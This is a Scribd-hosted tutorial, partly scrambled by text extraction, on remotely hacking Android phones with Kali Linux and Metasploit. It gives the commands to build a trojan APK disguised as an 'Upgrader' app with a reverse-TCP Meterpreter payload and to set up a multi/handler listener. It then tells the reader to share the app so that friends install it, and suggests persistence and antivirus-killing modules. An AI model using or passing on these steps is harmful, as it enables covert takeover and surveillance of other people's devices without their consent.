Scribd
Upload
4K views

How To Hack Android Using Kali (Remotely) : Step 1: Fire-Up Kali

This document provides steps to hack Android phones remotely using Kali Linux. It involves creating a Trojan APK file with Metasploit, setting up a listener on Kali, and tricking the target into installing the malicious app. When installed, it will establish a reverse TCP connection and provide a Meterpreter shell on the attacker's machine, allowing control of the target device from anywhere on the internet.

Uploaded by

muugii_1983
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
4K views

How To Hack Android Using Kali (Remotely) : Step 1: Fire-Up Kali

This document provides steps to hack Android phones remotely using Kali Linux. It involves creating a Trojan APK file with Metasploit, setting up a listener on Kali, and tricking the target into installing the malicious app. When installed, it will establish a reverse TCP connection and provide a Meterpreter shell on the attacker's machine, allowing control of the target device from anywhere on the internet.

Uploaded by

muugii_1983
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

How to Hack Android Using Kali

(Remotely)
This is a tutorial explaining how to hack android
I can't see any tutorials explaining this Hack/Exploit,
(Still ,you may already know about this)

phones with
so, I made

Kali.
one.

Step 1: Fire-Up Kali:


Open a terminal, and make a Trojan .apk

You can do this by typing :

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R >


/root/Upgrader.apk (replace LHOST with your own IP)
You can also hack android on WAN i.e. through Interet by using
yourPublic/External IP in the LHOST and by port forwarding (ask me about port
forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

Open another terminal until the file is being produced.

Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:


After it loads(it will take time), load the multi-handler exploit by typing :use
exploit/multi/handler

Set
up
a
(reverse)
payload
by
typing
:
set
payload
android/meterpreter/reverse_tcp
To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type
your private/internal IP here not the public/external)

Step 4: Exploit!
At last type: exploit to start the listener.

Copy the application that you made (Upgrader.apk) from the root folder, to you
android phone.

Then send it using Uploading


(like:www.speedyshare.com).

Then send the link that the Website gave you to your friends and exploit their phones
(Only on LAN, but if you used the WAN method then you can use the exploit anywhere
on the INTERNET)

Let the Victim install the Upgrader app(as he would think it is meant to upgrade some
features on his phone)

However, the option of allowance for Installation of apps fromUnknown


Sources should be enabled (if not) from the security settings of the android phone to
allow the Trojan to install.

And when he clicks Open...

it

to

Dropbox

or

any

sharing

website

Step 5: BOOM!
There comes the meterpreter prompt:

------------------------------------------HACKED-------------------------------------------------

The END:
Keep
coming
for
Some post modules that work for windows might
For Eg: run killav, persistence (persistent backdoor) etc.

not

work

in

more!
android

You might also like